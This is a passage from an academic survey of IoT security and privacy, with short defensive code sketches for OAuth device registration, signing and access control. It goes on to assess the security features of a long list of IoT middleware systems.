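one mitigation for the second of these challenges, and for the shared-credential problem discussed in cell a , is to issue every device its own credentials at setup time, for example via the oauth dynamic client registration process proposed above. a hedged sketch follows; the registration endpoint and device name are placeholders, not part of any surveyed system:

```python
# Sketch of OAuth 2.0 Dynamic Client Registration (RFC 7591) used to give a
# device unique credentials. The endpoint URL and metadata are placeholders.
import json
import urllib.request

registration = {
    "client_name": "thermostat-7f3a",                  # hypothetical device name
    "grant_types": ["client_credentials"],
    "token_endpoint_auth_method": "client_secret_basic",
}

req = urllib.request.Request(
    "https://auth.example.com/register",               # placeholder endpoint
    data=json.dumps(registration).encode("utf-8"),
    headers={"Content-Type": "application/json"},
    method="POST",
)

with urllib.request.urlopen(req) as resp:
    issued = json.load(resp)

# The response carries per-device credentials, e.g. issued["client_id"] and
# issued["client_secret"]; losing one device then compromises only that device.
```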
in the sybil attack [ ] a single node or nodes may impersonate a large number of different nodes thereby taking over a whole network of sensors. in all cases, attestation is a key defence against these attacks. another defence is the use of reputation and reputational models to associate a trust value to devices on the network. reputation is a general concept widely used in all aspects of knowledge ranging from humanities, arts and social sciences to digital sciences. in computing systems, reputation is considered as a measure of how trustworthy a system is. there are two approaches to trust in computer networks: the first involves a “black and white” approach based on security certificates, policies, etc. for example, spins [ ], develops a trusted network. the second approach is probabilistic in nature, where trust is based on reputation, which is defined as a probability that an agent is trustworthy. in fact, reputation is / often seen as one measure by which trust or distrust can be built based on good or bad past experiences and observations (direct trust) [ ] or based on collected referral information (indirect trust) [ ]. in recent years, the concept of reputation has shown itself to be useful in many areas of research in computer science, particularly in the context of distributed and collaborative systems, where interesting issues of trust and security manifest themselves. therefore, one encounters several definitions, models and systems of reputation in distributed computing research (e.g. [ , , ]). there is considerable work into reputation and trust for wireless sensor networks, much of which is directly relevant to iot trust and reputation. the hermes and e-hermes [ , ] systems utilise bayesian statistical methods to calculate reputation based on how effectively nodes in a mesh network propogate messages including the reputation messages. similarly, [ ] evaluates reputation based on the packet-forwarding trustworthiness of nodes, in this case using fuzzy logic to provide the evaluation framework. another similar work is [ ] which again looks at the packet forwarding reputation of nodes. in iot, [ ] utilizes the concept of a utility function to create a reputational model for iot systems using the mqtt protocol. . c : cloud authentication the ietf has published a draft guidance on security considerations for iot [ ]. this draft does discuss both the bootstrapping of identity and the issues of privacy-aware identification. one key aspect is that of bootstrapping a secure conversation between the iot device and other systems, which includes the challenge of setting-up an encrypted and/or authenticated channel such as those using tls, host identity protocol (hip) or diet hip. hip [ ] is a protocol designed to provide a cryptographically secured endpoint to replace the use of ip addresses, which solves a significant problem – ip-address spoofing – in the internet. diet hip [ ] is a lighter-weight rendition of the same model designed specifically for iot and machine to machine (m m) interactions. while hip and diet hip solve difficult problems, they have significant disadvantages to adoption. secure device identity models that work at higher levels in the network stack, such as token-based approaches, can sit side by side with existing ip-based protocols and require no changes at lower levels of the stack. by contrast, hip and diet hip require low-level changes within the ip stack to implement. 
as they replace traditional ip addressing they require many systems to change before a new device using hip can successfully work. in addition, neither hip nor diet hip address the issues of federated authorization and delegation. in [ ] and [ ] it is proposed to use federated identity protocols such as oauth [ ] with iot devices, especially around the mqtt protocol [ ]. the iot-oas [ ] work similarly addresses the use of oauth with coap. other related works include the work of augusto et al. [ ] have built a secure mobile digital wallet by using oauth together with the xmpp protocol [ ]. in [ ], the usage of oauth for iot devices is extended to include the use of dynamic client registration [ ] which allows each device to have its own unique identity, which we discussed as an important point in the section about cell a . a contradictory aspect of iot authentication is the proposal to use secure pseudonyms. a pseudonym is also sometimes referred to as an anonymous identity. effectively, a secure pseudonym is a way of a user securely interacting with a system without giving away their real identity. this overlaps with cell c where we look at access control for cloud systems. we have seen from well-publicised cases that systems may be compromised and offer personal information, even years after that information was originally stored. in one case, two suicides have been attributed to an attack that compromised personal identities [ ]. pseudonyms are an approach that can be considered to treat the sharing of meta-data as important as sharing of data. also see section where we look at another model of privacy. in [ ] a capability-based access system is described that allows anonymous identities to be used. [ ] provides an architecture reference model for an approach that supports anonymous identities. neither of these systems separate the provision of anonymous identities from the data-sharing middleware. a concept called zooko’s triangle [ ] proposed that it is only possible to support two out of the following three capabilities in a system: human-readable names; decentralised infrastructure; and security. recent papers, such as [ ], claim that the blockchain construct proves zooko’s hypothesis wrong. in [ ] the concept of anonymous identities for blockchains is explored, which will have significant impact as blockchains become more prevalent in iot. / . a : device access control there are two challenges to access control at the device level. firstly, devices are often physically distributed and so an attacker is likely to be able to gain physical access to the device. the challenges here (hardware attacks, nand mirroring, etc) were already discussed in cell a . however, there is a further challenge: access control almost always requires a concept of identity. we cannot restrict or allow access except in the most basic ways without some form of authentication to the device. as discussed in our review of cell a , this is a significant challenge. to give a real life example, certain mobile phones have recently started encrypting data based on the user’s own lock-screen personal identification number (pin) code [ ]. this guarantees the data cannot be read without the user’s pin code. however, using nand mirroring, it has been demonstrated that the controls that stop repeated attempts at pin codes can be overcome [ ], with the result that a digit pin can easily be broken within a reasonable amount of time. 
systems such as webinos [ ] have proposed using policy-based access control mechanisms such as xml access control markup language (xacml) [ ] for iot devices. however, xacml is relatively heavyweight and expensive to implement [ ], especially in the context of low power devices. to address this, webinos has developed an engine which can calculate the subset of the policy that is relevant to a particular device. despite this innovation, the storage, transmission and processing costs of xacml are still high for an iot device. another approach based around a standard called uma is covered in cell c . . b : network access control there are a number of researchers looking at how to create new lightweight protocols for access control in iot scenarios. [ ] describe a new protocol for iot authentication and access control is proposed based on ecc with a lightweight handshake mechanism to provide an effective approach for iot, especially in mobility cases. [ ] propose a non-centralised approach for access control that uses ecc once again and supports capability tokens in the coap protocol. . c : cloud access control the biggest challenge for privacy is ensuring access control at the server or cloud environment of data collected from the iot. there is some significant overlap with the area of confidentiality of data in the cloud as well (cell c ). it is argued in [ ] that existing hierarchical models of access control are not appropriate for the scale and scope of the iot. there are two main approaches to address this. the first is policy-based security models where roles and groups are replaces by more generic policies that capture real-world requirements such as “a doctor may view a patient’s record if they are treating that patient in the emergency room”. the second approach to support the scale of iot is user-directed security controls, otherwise known as consent. this is the approach we take in this thesis. in [ ] a strong case is made for ensuring that users can control access to their own resources and to the data produced by the iot that relates to those users. the user managed access (uma) from the kantara initiative enhances the oauth specification to provide a rich environment for users to select their own data sharing preferences [ ]. we would argue strongly that this overall concept of user-directed access control to iot data is one of the most important approaches to ensuring privacy. in [ ], an approach for using uma together with oauth is proposed for constrained devices. this approach also addresses cell a . while this approach has a lot of capabilities and power, there is a slow uptake of uma in real-world services and even less in iot. we propose that the complexity of this approach is the inhibitor to widespread adoption. [ ] argues that contextual approaches must be taken to ensure privacy with the iot. many modern security systems use context and reputation to establish trust and to prevent data leaks. context-based security [ ] defines this approach which is now implemented by major web systems including google and facebook. this is closely related to reputation-based models which we discussed above. . a : device non-repudiation the biggest challenge in the non-repudiation network with iot devices is the challenge of using attestation for small devices. attestation is discussed in detail in cell a . without attestation, we cannot trust that the device system has not been modified and therefore it is not possible to trust any non-repudiation data from the device. / . 
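where a device or its gateway does have the resources for public-key cryptography, signing each reading is the usual building block for attributing data to a device. a minimal sketch, assuming the third-party python "cryptography" package and an illustrative payload (this is not a protocol taken from the surveyed literature):

```python
# Sign a reading with a per-device ECDSA key (NIST P-256) so a receiver can
# later attribute it to the device; verification fails if either the reading
# or the signature has been altered.
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

device_key = ec.generate_private_key(ec.SECP256R1())   # would live in secure storage
reading = b'{"device":"pump-12","ts":1500000000,"pressure":4.2}'

signature = device_key.sign(reading, ec.ECDSA(hashes.SHA256()))

# Receiver side: verify with the device's public key; raises
# cryptography.exceptions.InvalidSignature on any tampering.
device_key.public_key().verify(signature, reading, ec.ECDSA(hashes.SHA256()))
```

as the earlier cells make clear, the practical difficulty on the smallest devices is not this api but the cost of the underlying operations and the protection of the private key.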
b : network non-repudiation the same challenges apply here as discussed in cells b , b . non-repudiation on the wire requires cryptography techniques and these are often hindered by resource restrictions on small devices. in [ ] a non-repudiation protocol for restricted devices is proposed. . c : cloud non-repudiation this area is unchanged by the iot, so we do not discuss it any further. in the previous eighteen sections we have outlined a significant number of threats and challenges, and used this matrix to assess the most relevant current work in each space. before summarising this work, we look at an orthogonal model more closely focussed on user privacy. this model will be used in later sections to assess the outcomes of this thesis. three layer privacy model one area that crosses most or all of the cells in our matrix is the need for a holistic and studied approach to enabling privacy in the iot. as discussed in a number of cells, there are significant challenges to privacy with the increased data and metadata that is being made available by iot-connected devices. an approach that has been proposed to address this is privacy by design [ ]. this approach suggests that systems should be designed from the ground up with the concept of privacy built into the heart of each system. many systems have added security or privacy controls as “add-ons”, with the result that unforeseen attacks can occur. spiekermann and cranor [ ] offer a model for looking at user privacy. in their model, they identify three spheres: the user sphere, the joint sphere and the recipient sphere. the user sphere is completely in the control of the user (e.g. a laptop). the joint sphere refers to areas that may seem to be in the user’s control, but may have some significant control by a third-party. for example, a cloud email account may seem like the user can delete emails, but the cloud provider may in fact back these up and keep a copy. finally, once data has been transferred to a third-party, it is assumed to be in the recipient sphere, where the only controls are legal and contractual. in the model, a device that offers the user full control is firmly in the user sphere. however, we would argue that many current devices are actually in the joint sphere. this is where the device appears to be in the control of the user but in fact is in the control of a third-party. to give an example, the google nest device offers users the opportunity to apply smart heating controls to their house. while a number of user-centred controls give the user the impression that it is in the user sphere, there are two key reasons to counter this: firstly, the data logged by the device is extensive and cannot be controlled by the user; secondly, the device auto-updates itself based on commands from google rather than based on user input [ ]. using this model, we can propose clear approaches that strengthen each of the privacy and security controls available in each sphere. figure provides an overview of this model and its applicability to the iot domain. . user sphere moving privacy and security controls back to the users inherently strengthens the user sphere and provides greater choice, thereby allowing more secure approaches to flourish. as discussed above, devices need to have secure identities, and currently these are either not provided, or provided by the device manufacturer. a second, related issue, is the ownership of devices. the mirai botnet spread because dictionary attacks allowed attackers to take ownership of devices. 
some systems offer models of taking ownership securely (e.g. bluetooth, near field communication (nfc)). in [ ], there is a system described where a qr code is used in conjunction with a web-based system. a third issue within the user sphere is updating the device firmware. a number of attacks have originated in a lack of updates. one issue is that device manufacturers are incentivised to create new products but not to update old products. in [ ], a model is proposed whereby devices can pay for updates using a blockchain-based cryptocurrency such as bitcoin. in [ ] there is an approach where iot devices are updated based on the secure identity and consent models used in oauth .

figure . three-layer privacy model applied to iot (user sphere: device identity, device ownership and registration, device updates; joint sphere: consent management, policies; recipient sphere: consent tracking, policy enforcement, data revocation).

. joint sphere recall that the joint sphere covers the parts of the system where the user has some form of control over their data and systems, but the provider also shares control. for example, a health-monitoring device may upload data to an internet-based system and then may offer users controls on how they share data. a major change in legislation around this is the european union's general data protection regulation (gdpr) [ ], which requires much stronger consent controls. many systems offer forms of user consent for sharing data with third parties, but these lack significant requirements. for example, many users are not aware of how to revoke consent. similarly, there is no clear place where a user can identify all the consents they have approved across different devices. consent is not just about privacy: iot devices often include actuators that can act based on commands, and the security of a device includes ensuring that only authorised systems can issue commands to devices. we looked at consent above (cell c ); a related area is that of policies. in this context, a policy is a computer-readable expression of rights and obligations. for example, a consent approval may refer to a policy: the user might approve sharing of data to a website based on the fact that the website promises not to share the data with any other body. languages such as xacml [ ] allow complex access control policies to be encoded in xml or json. we discussed this in cell c . . recipient sphere the recipient sphere is the area where the user's data is now out of their control. ultimately, the user must rely on legislation or legal contracts in order to maintain control of this data. of course, it is hard to police this recipient sphere: it is possible that the third-party website will share data in breach of the agreed policies. in addition, many organisations have such complex and poorly worded policies that users are unaware of the rights they are giving up to their data. spotting illicit data shares can possibly be done using the concept of a trap street: the habit that map-makers have of including incorrect data to see if others copy it. similarly, iot devices could deliberately share incorrect data with specific parties to see if it leaks out against the agreed policy. summary of the review of security issues in this section we have proposed a widened ontology for evaluating the security issues surrounding the internet of things, and examined the existing literature and research in each of the cells of the expanded matrix. we have also related these issues to spiekermann and cranor's three-layer privacy model.
this is an important basis for the next section where we examine the provisions around security and privacy that are available in available middleware for the internet of things. in reviewing these areas, we identified a list of security properties and capabilities that are important for the security and privacy of iot. we will use this list in the second part of this paper as columns in a new table where we evaluate a set of middleware on their provision of these capabilities. req - integrity and confidentiality the requirement to provide integrity and confidentiality is an important aspect in any network and as discussed in cells a -b there are a number of challenges in this space for iot. req - access control maintaining access control to data that is personal or can be used to extract personal data is a key aspect of privacy. in addition, it is of prime importance with actuators that we do not allow unauthorised access to control aspects of our world. req . - consent as described in cells a -c , traditional hierarchical models of access control are ineffective for personal data and iot systems. consent approaches – such as oauth and uma – are a key requirement. req . - policy-based access control as discussed in cells a -c , policy-based access control models such as xacml enable privacy considerations and rules to be implemented effectively in iot scenarios, although in many cases models such as xacml are too heavyweight to deploy into devices. req - authentication as discussed in numerous of the cells, iot systems need a concept of authentication in order to enable integrity, confidentiality, and access control amongst other requirements. req . - federated identity as argued in cells a -c , there is a clear motivation for the use of federated models of identity for authentication in iot networks. req . - secure device identity managing the security of devices requires unique credentials to be embedded into each device and secure registration processes as discussed in cell a . req . anonymous identities in order to guard against de-anonymisation and other leakages of personally identifiable information, anonymous identities/pseudonyms can offer individuals clearer consent as to when they wish to actively share their identity, as discussed in a . req - attestation attestation is an important technique to prevent tampering with physical devices (as discussed in cells in column a) and hence issues with integrity of data as well as confidentiality in iot. req - summarisation and filtering the need to prevent de-anonymisation is a clear driver for systems to provide summarisation and filtering technologies such as stream processing. req - context-based security and reputation many modern security models adapt the security based on a number of factors, including location, time of day, previous history of systems, and other aspects known as context. another related model is that of the reputation of systems, whereby systems that have unusual or less-than-ideal behaviour can be trusted less using probabilistic models. in both cases there are clear application to iot privacy as discussed above. / while we consider pbd an important aspect, we argue that it is a meta-requirement: it effectively covers the need to implement the major security and privacy requirements from the initial design outwards. there are of course many other aspects to iot security and privacy as we have demonstrated in the matrix table and accompanying description of each cell. 
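as an aside, the context-based security and reputation requirement above is the one that lends itself to a compact illustration: a probabilistic score that degrades as a device misbehaves. the sketch below uses the standard beta-estimator form purely as an illustration; it is not taken from any of the cited reputation systems, and the prior and threshold are arbitrary choices:

```python
# Probabilistic (beta) reputation: good and bad interactions update a trust
# estimate; the prior and the trust threshold are illustrative choices.
from dataclasses import dataclass

@dataclass
class Reputation:
    good: int = 0
    bad: int = 0

    def record(self, outcome_ok: bool) -> None:
        if outcome_ok:
            self.good += 1
        else:
            self.bad += 1

    @property
    def score(self) -> float:
        # Expected value of a Beta(good + 1, bad + 1) distribution.
        return (self.good + 1) / (self.good + self.bad + 2)

node = Reputation()
for ok in (True, True, True, False, True):
    node.record(ok)

print(round(node.score, 2))          # 0.71
trusted = node.score >= 0.6          # downstream systems can gate on this
```

this is, of course, only one of the requirements listed above; pbd remains a meta-requirement that spans all of them.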
however, these specific aspects form an effective set of criteria by which to analyse different systems, as we show below in the next section. secure middleware for the internet of things middleware has been defined as computer software that has an intermediary function between the various applications of a computer and its operating system [ ]. in our case, we are interested in middleware that is specifically designed or adapted to provide capabilities for iot networks. there are a number of existing surveys of iot middleware. bandyopadhyay et al. [ , ] review a number of middleware systems designed for iot systems. while they look at security in passing, there is no detailed analysis of the security of each middleware system. [ ] calls out the need for security, but no analysis of the approaches or existing capabilities is provided. [ ] is a very broad survey paper that addresses iot middleware loosely. [ ] is another wide-ranging survey of iot middleware that provides a simple analysis of whether the surveyed systems have any support for security or privacy, but does not address detailed requirements. it is clear then, that a detailed evaluation of security in iot middleware is a useful contribution to the literature. we therefore identified a set of middleware systems to study. . middleware review methodology this set was identified through a combination of the existing literature reviews on iot middleware [ , , ] together with our own search for middleware systems that explicitly target iot scenarios. some of the systems that were included in these papers we excluded from our list on the basis that they were not middleware. for example, [ ] lists tinyrest [ ] as a middleware, but in fact we considered this paper to be the definition of a standard protocol and therefore we excluded it. our search strategy was to use a search for the terms (”iot” or ”internet of things”) and ”mid- dleware”. we searched only in the subject terms and restricted the search to academic papers written in english. the search was carried out by the portsmouth university discovery system which is a metasearch engine. the list of databases that are searched is available at [ ]. the search was originally issued on june th, , identifying papers. it was repeated on december st, , and papers were identified, showing a significant growth in iot middleware papers over the intervening period. we then manually reviewed the abstracts of the papers to identify a list of functioning middleware systems as opposed to papers that describe other aspects of iot without describing a middleware system. this produced a list of middleware systems. in our study, we looked for the security and privacy requirements listed in section . we also identified if the middleware had a clearly defined security model and/or security implementation. out of the middleware systems identified, we found that had no published discussion or architecture for security, or such a minimal description that we were not able to identify any support for the selected security requirements. we label these as non-secured systems. . non-secured systems we provide a brief description of each of the non-secure middleware systems: asip the arduino service interface programming model (asip) [ ] is a middleware for arduino hardware. aspire aspire project (advanced sensors and lightweight programmable middleware for innova- tive rfid enterprise applications) [ ] is a eu-funded project that created an open, royalty-free middleware for rfid-based applications. 
autonomic qos management [ ] offers a middleware that autonomically manages quality of service (qos) in iot scenarios. while this does address some aspects related to security (i.e. accuracy and availability), there is no discussion of how security is handled. cascom in [ ] a semantically-driven configuration model is built on top of existing middleware systems such as gsn [ ]. the authors state their intention of addressing privacy in future work. / cirus cirus [ ] is a cloud-based middleware for ubiquitous analytics of iot data. cloud-based car parking middleware in [ ] the authors describe an osgi-based middleware for smart cities enabling iot-based car parking. context aware gateway [ ] provides a reference architecture for using context-awareness in iot sce- narios. the middleware itself does not address security or privacy and the authors plan to address this in further work. damp in [ ] there is a middleware – distributed applications management platform – that can configure systems based on quality of service characteristics (qos). these characteristics can include security, but the system itself does not offer any security model. dioptase dioptase [ ] is a restful stream-processing middleware for iot. dioptase does address one useful aspect for privacy: intermediate stream processing of data, summarisation and filtering. however, there is no detailed security architecture and description and the security model is left as an item of future work. edbo [ ] describes the emergent distributed bio-organization: a biologically-inspired platform for self-organising iot systems. edsoa an event-driven service-oriented architecture for the internet of things service execu- tion [ ] describes an approach that utilizes an event-driven soa. emma the environmental monitoring and management agent (emma) is a proposed middleware based on coap [ ]. it does not offer any security architecture. gsn the gsn framework [ ] (global sensor networks) defines a middleware for the internet of things that requires little or no programming. the security architecture of the system is not described in any detail: there are diagrams of the container architecture which point to proposed places for access control and integrity checks, but unfortunately there is not sufficient discussion to be able to categorize or evaluate the approach taken. hi-speed usb middleware [ ] offers a middleware based on usb. hitch hiker hitch hiker . [ ] is a prototype middleware environment built on contiki os. lmts in [ ] a middleware system for asset tracking (laptop management and tracking system) is described. middleware for environmental monitoring and control [ ] defines a middleware for environmen- tal monitoring and control. middleware for industrial iot [ ] describes a middleware for industrial iot based on opendds, which is a middleware that implements the data distributions services (dds) protocol. at the time of writing the dds security model was in development and hence the architecture does not address security. mifim middleware for future internet models (mifim) [ ] is a web service-based architecture that uses aspect-orientation to allow for simpler reconfiguration. mosden mosden (mobile sensor data processing engine) [ ] is an extension of the gsn ap- proach (see above) which is explicitly targeted at opportunistic sensing from restricted devices. m-hub [ ] describes a middleware for mobile iot applications built on top of another middleware (scalable data distribution layer). 
in [ ] this work is enhanced to create a middleware for ambient assisted living. in [ ] there is another middleware based on m-hub. there is no support for security or privacy described. palcom palcom [ ] is a middleware designed for pervasive computing, including iot systems. it supports ad-hoc composition of services. there is no discussion of security beyond a statement that traditional security models may be added in future. / pobicos platform for opportunistic behaviour in incompletely specified, heterogeneous object communities (pobicos) [ ] is a device middleware designed to run on small devices. in [ ] there is a description of migrating aspects of the middleware to a proxy to enable support for smaller devices. proteus proteus is a process manager designed to support cyber-physical systems [ ]. it describes a middleware for complex self-healing processes. remoteu¡ [ ] offers a middleware for remote user interfaces. sbiotcm in a soa based iot communication middleware [ ] is a middleware based on soap and ws. there is no security model described. service oriented access for wireless sensor networks [ ] provides a service-oriented middleware for iot and wireless sensor network data. smart object middleware [ ] describes a smart object middleware based on java. symbiote in [ ] a roadmap is laid out for a new eu funded project to allow vertical iot platforms to interoperate and federate. there is no plan for security presented. thingsonomy thingsonomy [ ] is an event-based publish-subscribe based approach that applies se- mantic technology and semantic matching to the events published within the system. ubiroad the ubiroad middleware [ ] is a specialization of the ubiware project specifically targeting traffic, road management, transport management and related use-cases. ubisoap ubisoap [ ] is a service-oriented architecture (soa) approach that builds a middleware for ubiquitous computing and iot based on the web services (ws) standards and the soap protocol. veot [ ] describes a virtual environment of things which is a middleware for virtual reality engage- ment with the internet of things. wherex wherex [ ] is an event-based middleware for the iot. secured systems we identified middleware systems that implement or describe sufficient security architecture that we could evaluate them against the requirements that were identified in section . we describe these systems as secured. in addition to the requirements identified above, we also identified whether the systems had explicit support or adaptation for iot specific protocols: mqtt, coap, dds, bluetooth or zigbee. as discussed above, in section , these protocols have been specifically designed for low-power devices. we label this requirement req . table shows the summary of this analysis. for each of the secured middleware system we looked at the core published papers and also examined any further available documentation. below are the specific details of each middleware system. . &cube in [ ] they describe a middleware, &cube, that is designed to offer restful apis as well as mqtt connections to integrate with iot devices. the system offers a security manager providing encryption, authentication and access control. no further details are available on the techniques used. . device cloud in [ ] there is a blueprint for a middleware that applies cloud computing concepts to iot device middleware. a more detailed exposition is given in [ ]. the approach supports oauth . to provide tokens to devices. 
it also supports encryption and access control. there is no support for summarisation, filtering, or consent-based access control described in the publications. table . summary of reviewed middleware systems and major properties. the table marks, for each reviewed system (&cube, device cloud, drems, droplock, fiware, hydra/linksmart, income, iot-mp, nerd, nos, openiot, sensoract, sirena, smepp, socrades, ubiware, webinos, xmpp and virtus), which of the following it provides: req - integrity and confidentiality; req - access control; req . - consent; req . - policy-based security; req - authentication; req . - federated identity; req . - secure device identity; req . - anonymous identities; req - attestation; req - summarisation and filtering; req - context-based security/reputation; req - iot-specific protocol support. . drems distributed realtime managed systems (drems) [ ] is a combination of software tooling and a middleware runtime for iot. it includes linux operating system extensions as well. drems is based on an actor [ ] model and has a well-defined security model that extends to the operating system. the security model includes the concept of multi-level security (mls) for communications between a device and the actor. the mls model is based on labelled communications. this ensures that data can only flow to systems that have a higher clearance than the data being transmitted. this is a very powerful security model for government and military use-cases. however, this approach does not address needs-based access control. for example, someone with top secret clearance may read data that is categorised as secret even if they have no business reason to utilise that data. the weaknesses of this model have been shown with situations such as the snowden revelations. . droplock in [ ] the authors describe a middleware specifically built for iot systems and smart cities. the droplock system is designed to enable secure smartphone access to a smart locker, allowing delivery personnel secure access to drop off packages. the system uses secure tokens to allow access to devices. the tokens are passed to the secure locker using bluetooth. . fiware fiware [ ] is a middleware designed to be the basis of a future internet, sponsored by the european union under the fp programme. fiware is one of the few systems that claim to have used pbd as a basis for design [ ]. fiware has a concept of plugins, known as generic enablers (ge). the security model is implemented through ges including the identity management (idm ge), the authorization policy decision point (pdp) ge, and the policy enforcement point (pep) proxy. the standard approach within fiware is based on oauth and xacml. it also supports interoperable standards for exchanging identities with other systems. the overall security design of fiware fits into modern authentication and authorization models. iot devices are catered for in the fiware architecture through a gateway model. the iot devices connect to the gateway using iot specific protocols. the gateway is part of the iot edge. this communicates via the standard fiware protocols into an iot backend where there are components supporting device management and discovery. the fiware documentation does not describe any specific adaptation of security or support for security between devices and the gateway.
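to illustrate the enforcement-point pattern that fiware describes (a pep proxy consulting a pdp before forwarding a request), the sketch below checks a bearer token and then evaluates a simple scope-and-resource rule. it is not fiware code: the token store, the policy format and all names are assumptions standing in for the idm ge, the pdp ge and real xacml policies.

```python
import time

# illustrative token store: in fiware the identity management ge would issue
# and validate oauth tokens; here a dictionary stands in for that service.
ACCESS_TOKENS = {
    "token-abc": {"subject": "sensor-gw-01",
                  "scopes": {"readings:write"},
                  "expires": time.time() + 3600},
}

# illustrative policy set: in fiware the pdp ge evaluates xacml policies;
# here each rule simply maps (scope, resource prefix, action) to a decision.
POLICIES = [
    {"scope": "readings:write", "resource_prefix": "/v1/readings/",
     "action": "POST", "decision": "Permit"},
]


def pep_check(token, resource, action):
    """sketch of a policy enforcement point: authenticate the token, then ask the 'pdp'."""
    info = ACCESS_TOKENS.get(token)
    if info is None or info["expires"] < time.time():
        return "Deny"                         # unauthenticated or expired token
    for rule in POLICIES:
        if (rule["scope"] in info["scopes"]
                and resource.startswith(rule["resource_prefix"])
                and rule["action"] == action):
            return rule["decision"]
    return "Deny"                             # default-deny when no rule applies


if __name__ == "__main__":
    print(pep_check("token-abc", "/v1/readings/room-3", "POST"))   # Permit
    print(pep_check("token-abc", "/v1/actuators/door-1", "POST"))  # Deny
```

in a real deployment the token would be validated against the identity provider and the decision would come from an xacml engine; the sketch only shows how the authentication and authorization checks compose at the enforcement point.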
. hydra / linksmart hydra [ ] was a european union funded project which has since been extended and renamed as linksmart. the hydra team published a detailed theoretical model of a policy-based security approach [ ]. this model is based on using lattices to define the flow of information through a system. this model provides a language-based approach to security modelling. however, whilst this paper is published as part of the hydra funded project, there is no clear implementation of this in the context of iot or description of how this work can benefit the iot world. nevertheless, because hydra / linksmart is an open source project [ ] with documentation beyond the scientific papers, it is possible to understand the security model in greater detail by reviewing this project. the hydra and linksmart architectures are both based on the web services (ws) specifications, building on the soap protocol [ ], which in turn builds on the xml language [ ]. the security model is described in some detail in the linksmart documentation [ ]. the model utilises xml security [ ]. there are significant challenges in using this model in the iot world, as discussed above in section . the hydra/linksmart approach also uses symmetric keys for security, which is a challenge for iot because each key must be uniquely created, distributed into each device and updated upon expiry, creating a major key management issue. hydra / linksmart offers a service called the trustmanager. this is a system that uses the cryptographic capabilities to support a trusted identity for iot devices. this works with a public key infrastructure (pki) and certificates to ensure trust. once again there are challenges in the distribution and management of the certificates to the devices which are not addressed in this middleware. the hydra middleware does not offer any policy based access control for iot data, and does not address the secure storage of data for users, nor offer any user-controlled models of access control to users’ data. in [ ] there is a specific instantiation of linksmart applied to energy efficiency in buildings. there is no further extension to the security model. . income income [ ] is a framework for multi-scale context management for the iot, funded by the french national research agency. the aim of income is to fuse together context data from multiple levels to provide a high-level set of context data from iot systems that can be applied to decision making, including trust, privacy and security decisions. mudebs and mucontext [ ] are frameworks built on top of income that add attribute-based access control (abac) and quality of context (qoc) processing. mudebs utilises xacml policies to implement abac. mucontext validates qoc and enables privacy filtering. . iot-mp the iot management platform (iot-mp) is a middleware system described in [ ]. iot-mp offers a security module that implements attribute-based access control (abac) against systems. iot-mp has a model whereby an agent is registered for each class of things, creating the concept of a managed thing. agents have unique secure identities. the iot-mp does not define how devices are identified to agents.
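income's mudebs framework and iot-mp both rely on attribute-based access control, where a decision is computed from attributes of the requester, the resource and the environment rather than from a fixed role hierarchy. the sketch below shows the general shape of such a decision with a single toy rule; the attribute names and the working-hours constraint are assumptions made for illustration and do not come from either system.

```python
def abac_decide(subject, resource, environment):
    """toy attribute-based access control decision.

    the decision is made purely from attributes of the subject, the resource
    and the environment. the single rule below permits access to coarse,
    building-level location data for facility-management purposes during
    working hours; everything else is denied.
    """
    rule_applies = (
        resource.get("type") == "location"
        and resource.get("granularity") == "building"      # coarse data only
        and subject.get("purpose") == "facility-management"
        and 8 <= environment.get("hour", -1) < 18           # working hours
    )
    return "Permit" if rule_applies else "Deny"


if __name__ == "__main__":
    subject = {"id": "energy-dashboard", "purpose": "facility-management"}
    coarse = {"type": "location", "granularity": "building", "owner": "alice"}
    fine = {"type": "location", "granularity": "room", "owner": "alice"}
    print(abac_decide(subject, coarse, {"hour": 10}))   # Permit
    print(abac_decide(subject, fine, {"hour": 10}))     # Deny: too fine-grained
    print(abac_decide(subject, coarse, {"hour": 23}))   # Deny: outside working hours
```

a real abac deployment would express such rules in a policy language such as xacml and evaluate them at a dedicated decision point, but the attribute-driven structure of the decision is the same.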
. naps the naming, addressing and profile server (naps) [ ] describes a heterogeneous middleware for iot based on unifying data streams from multiple iot approaches. based on restful apis, the naps approach includes a key component handling authentication, authorization, and accounting (aaa). the design is based on the network security capability model defined in the etsi m m architecture [ ]. however, the main details of the security architecture have not yet been implemented and have been left for future work. there is no consideration of federated identity or policy based access control. . nerd no effort rapid development (nerd) [ ] is a middleware designed for human iot interfaces, especially around bluetooth le systems and ibeacon discovery. it does not add any new security measures but uses the existing security models in bluetooth and http. . nos networked smart objects (nos) [ , ] takes an interesting approach to security where the aim is to provide each item of data with a reputational score based on a quality analyser and a security analyser. a machine learning algorithm is used to learn the behaviour of systems in the network and adjust the scores based on the potential attacks and the applied countermeasures. the system incorporates keys and key-based authentication, encryption and complex passwords. . openiot openiot is an open cloud-based middleware for the internet of things, funded by the european union fp programme. it also extends the gsn framework. the security module uses oauth as the main authentication and authorization model for web-based systems. no details are given of how sensors are authenticated or authorized. . sensoract sensoract [ ] is an iot middleware specifically aimed at providing support for building management systems (bms). it supports fine-grained access control through the use of a rules engine to implement access control policies. no details are provided of the authentication models at the device level or the web interface. . sirena sirena (service infrastructure for real-time embedded networked devices) [ ] is a soap/ws-based middleware for iot and embedded devices. while there is little description of the security framework in sirena, it does show the use of the ws-security specification. as previously discussed, this approach is very heavyweight and has issues with key distribution, federated identity and access control. . smepp secure middleware for p p (smepp) [ ] is an iot middleware explicitly designed to be secure, especially dealing with challenges in the peer-to-peer model. smepp security is based around the concept of a group. when a peer attempts to join a group, the system relies on challenge-response security to implement mutual authentication. at this point the newly joined peer is issued a shared session key which is shared by all members of the group. smepp utilizes elliptic curve cryptography to reduce the burden of encryption on smaller devices. overall smepp has addressed security effectively for peer-to-peer groups, but assumes a wider pki infrastructure for managing the key model used within each group. in addition, there is no discussion of access control or federated identity models, which are important for iot scenarios. the model is that any member of the group can read data published to the group using the shared session key. . socrades socrades [ ] is a middleware specifically designed for manufacturing shop floors and other industrial environments.
